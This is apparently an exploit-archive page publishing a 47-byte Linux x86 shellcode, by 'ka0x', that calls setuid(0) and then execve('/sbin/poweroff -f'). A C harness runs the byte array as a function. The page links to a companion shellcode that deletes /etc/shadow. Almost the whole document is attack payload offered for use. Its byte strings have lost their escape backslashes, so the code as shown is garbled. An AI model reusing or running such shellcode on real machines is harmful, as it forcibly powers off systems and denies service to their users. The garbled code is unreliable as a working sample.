[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Linux - setuid(0) & execve("/sbin/poweroff -f")
# Published : 2009-12-04
# Author : ka0x
# Previous Title : Linux - setreuid (0,0) & execve(/bin/rm /etc/shadow)
# Next Title : win xp sp2 PEB ISbeingdebugged shellcode
#include <stdio.h>
/*
linux/x86 ; setuid(0) & execve("/sbin/poweroff -f") 47 bytes
written by ka0x - <ka0x01[alt+64]gmail.com>
lun sep 21 16:40:16 CEST 2009
greets: an0de, Piker, xarnuz, NullWave07, Pepelux, JosS, sch3m4, Trancek, Hendrix and others!
*/
int main()
{
char shellcode[] =
"x31xdb" // xor ebx,ebx
"x6ax17" // push byte 0x17
"x58" // pop eax
"xcdx80" // int 80h
"x8dx43x0b" // lea eax,[ebx+0xb]
"x99" // cdq
"x52" // push edx
"x66x68x66x66" // push word 0x6666
"x68x77x65x72x6f" // push dword 0x6f726577
"x68x6ex2fx70x6f" // push dword 0x6f702f6e
"x68x2fx73x62x69" // push dword 0x6962732f
"x89xe3" // mov ebx,esp
"x52" // push edx
"x66x68x2dx66" // push word 0x662d
"x89xe1" // mov ecx,esp
"x52" // push edx
"x51" // push ecx
"x53" // push ebx
"x89xe1" // mov ecx,esp
"xcdx80" ; // int 80h
printf("[*] ShellCode size (bytes): %dnn", sizeof(shellcode)-1 );
(*(void(*)()) shellcode)();
return 0;
}